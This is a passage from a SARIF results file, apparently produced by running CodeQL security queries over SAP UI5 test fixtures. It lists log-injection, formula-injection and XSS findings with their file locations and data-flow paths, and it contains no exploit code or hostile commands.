unsafe-log-access","rule":{"id":"js/ui5-unsafe-log-access","index":3,"toolComponent":{"index":4}},"message":{"text":"Accessed log entries depend on [user-provided data](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":351},"region":{"startLine":5,"startColumn":9,"endLine":24,"endColumn":10}}}],"partialFingerprints":{"primaryLocationLineHash":"fad475448f62563d:1","primaryLocationStartColumnFingerprint":"-139"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":351},"region":{"startLine":6,"startColumn":5,"endLine":8,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":347},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":347},"region":{"startLine":15,"startColumn":25,"endColumn":53}},"message":{"text":"oModel. ... input')"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":347},"region":{"startLine":15,"startColumn":17,"endColumn":22}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":347},"region":{"startLine":17,"startColumn":34,"endColumn":39}},"message":{"text":"input"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":351},"region":{"startLine":6,"startColumn":5,"endLine":8,"endColumn":29}},"message":{"text":"user-provided data"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":351},"region":{"startLine":6,"startColumn":5,"endLine":8,"endColumn":29}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":347},"region":{"startLine":17,"startColumn":34,"endColumn":39}}}]},{"ruleId":"js/ui5-unsafe-log-access","rule":{"id":"js/ui5-unsafe-log-access","index":3,"toolComponent":{"index":4}},"message":{"text":"Accessed log entries depend on [user-provided data](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":316},"region":{"startLine":7,"startColumn":23,"endColumn":42}}}],"partialFingerprints":{"primaryLocationLineHash":"20e0edf06769f248:1","primaryLocationStartColumnFingerprint":"14"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":317},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":312},"region":{"startLine":11,"startColumn":11,"endColumn":22}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":312},"region":{"startLine":17,"startColumn":21,"endColumn":49}},"message":{"text":"oModel. ... input\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":312},"region":{"startLine":17,"startColumn":13,"endColumn":18}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":312},"region":{"startLine":18,"startColumn":30,"endColumn":35}},"message":{"text":"input"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":317},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided data"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":317},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":312},"region":{"startLine":18,"startColumn":30,"endColumn":35}}}]},{"ruleId":"js/ui5-unsafe-log-access","rule":{"id":"js/ui5-unsafe-log-access","index":3,"toolComponent":{"index":4}},"message":{"text":"Accessed log entries depend on [user-provided data](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":20,"startColumn":33,"endColumn":42}}}],"partialFingerprints":{"primaryLocationLineHash":"eb64edf724fde59e:1","primaryLocationStartColumnFingerprint":"22"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":325},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":8,"startColumn":11,"endColumn":22}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":14,"startColumn":21,"endColumn":49}},"message":{"text":"oModel. ... input\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":14,"startColumn":13,"endColumn":18}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":17,"startColumn":19,"endColumn":24}},"message":{"text":"input"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":325},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided data"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":325},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":17,"startColumn":19,"endColumn":24}}}]},{"ruleId":"js/ui5-unsafe-log-access","rule":{"id":"js/ui5-unsafe-log-access","index":3,"toolComponent":{"index":4}},"message":{"text":"Accessed log entries depend on [user-provided data](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":332},"region":{"startLine":9,"startColumn":29,"endColumn":38}}}],"partialFingerprints":{"primaryLocationLineHash":"eb64edf724fde59e:1","primaryLocationStartColumnFingerprint":"22"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":333},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":329},"region":{"startLine":11,"startColumn":11,"endColumn":22}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":329},"region":{"startLine":17,"startColumn":21,"endColumn":49}},"message":{"text":"oModel. ... input\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":329},"region":{"startLine":17,"startColumn":13,"endColumn":18}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":329},"region":{"startLine":18,"startColumn":30,"endColumn":35}},"message":{"text":"input"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":333},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided data"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":333},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":329},"region":{"startLine":18,"startColumn":30,"endColumn":35}}}]},{"ruleId":"js/ui5-unsafe-log-access","rule":{"id":"js/ui5-unsafe-log-access","index":3,"toolComponent":{"index":4}},"message":{"text":"Accessed log entries depend on [user-provided data](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":359},"region":{"startLine":9,"startColumn":29,"endColumn":35}}}],"partialFingerprints":{"primaryLocationLineHash":"e10e4681e4f3a5f2:1","primaryLocationStartColumnFingerprint":"22"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":11,"startColumn":11,"endColumn":22}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":17,"startColumn":21,"endColumn":49}},"message":{"text":"oModel. ... input\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":17,"startColumn":13,"endColumn":18}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":18,"startColumn":30,"endColumn":35}},"message":{"text":"input"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided data"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":18,"startColumn":30,"endColumn":35}}}]},{"ruleId":"js/ui5-unsafe-log-access","rule":{"id":"js/ui5-unsafe-log-access","index":3,"toolComponent":{"index":4}},"message":{"text":"Accessed log entries depend on [user-provided data](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":360},"region":{"startLine":7,"startColumn":23,"endColumn":42}}}],"partialFingerprints":{"primaryLocationLineHash":"20e0edf06769f248:1","primaryLocationStartColumnFingerprint":"14"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":11,"startColumn":11,"endColumn":22}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":17,"startColumn":21,"endColumn":49}},"message":{"text":"oModel. ... input\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":17,"startColumn":13,"endColumn":18}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":18,"startColumn":30,"endColumn":35}},"message":{"text":"input"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided data"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":18,"startColumn":30,"endColumn":35}}}]},{"ruleId":"js/ui5-formula-injection","rule":{"id":"js/ui5-formula-injection","index":4,"toolComponent":{"index":4}},"message":{"text":"The content of a saved file depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":270},"region":{"startLine":17,"startColumn":27,"endColumn":45}}}],"partialFingerprints":{"primaryLocationLineHash":"41899ff1a967017d:1","primaryLocationStartColumnFingerprint":"10"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":275},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":269},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":270},"region":{"startLine":8,"startColumn":23,"endColumn":38}},"message":{"text":"{ type: \"int\" }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":270},"region":{"startLine":17,"startColumn":27,"endColumn":45}},"message":{"text":"oControl.getText()"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":275},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":275},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-formula-injection","rule":{"id":"js/ui5-formula-injection","index":4,"toolComponent":{"index":4}},"message":{"text":"The content of a saved file depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":277},"region":{"startLine":23,"startColumn":27,"endColumn":39}}}],"partialFingerprints":{"primaryLocationLineHash":"9afa5fd07ee36af6:1","primaryLocationStartColumnFingerprint":"10"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":283},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":278},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":277},"region":{"startLine":9,"startColumn":23,"endColumn":41}},"message":{"text":"{ type: \"string\" }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":277},"region":{"startLine":15,"startColumn":29,"endColumn":47}},"message":{"text":"oControl.getText()"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":277},"region":{"startLine":15,"startColumn":21,"endColumn":26}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":277},"region":{"startLine":17,"startColumn":53,"endColumn":58}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":277},"region":{"startLine":17,"startColumn":46,"endColumn":59}},"message":{"text":"String(value)"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":277},"region":{"startLine":17,"startColumn":36,"endColumn":60}},"message":{"text":"encodeX ... value))"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":277},"region":{"startLine":17,"startColumn":21,"endColumn":33}},"message":{"text":"xssSanitized"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":277},"region":{"startLine":23,"startColumn":27,"endColumn":39}},"message":{"text":"xssSanitized"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":283},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":283},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-formula-injection","rule":{"id":"js/ui5-formula-injection","index":4,"toolComponent":{"index":4}},"message":{"text":"The content of a saved file depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":285},"region":{"startLine":16,"startColumn":23,"endColumn":51}}}],"partialFingerprints":{"primaryLocationLineHash":"e701acdf85af03b4:1","primaryLocationStartColumnFingerprint":"10"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":290},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":285},"region":{"startLine":10,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":285},"region":{"startLine":16,"startColumn":23,"endColumn":51}},"message":{"text":"oModel. ... input')"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":290},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":290},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":359},"region":{"startLine":16,"startColumn":31,"endColumn":45}}}],"partialFingerprints":{"primaryLocationLineHash":"3bb21c52eb38cf8:1","primaryLocationStartColumnFingerprint":"22"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":11,"startColumn":11,"endColumn":22}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":17,"startColumn":21,"endColumn":49}},"message":{"text":"oModel. ... input\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":17,"startColumn":13,"endColumn":18}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":18,"startColumn":30,"endColumn":35}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":359},"region":{"startLine":9,"startColumn":29,"endColumn":35}},"message":{"text":"oEvent"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":359},"region":{"startLine":16,"startColumn":31,"endColumn":37}},"message":{"text":"oEvent"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":359},"region":{"startLine":16,"startColumn":31,"endColumn":45}},"message":{"text":"oEvent.message"}}}]}]}],"relatedLocations":[{"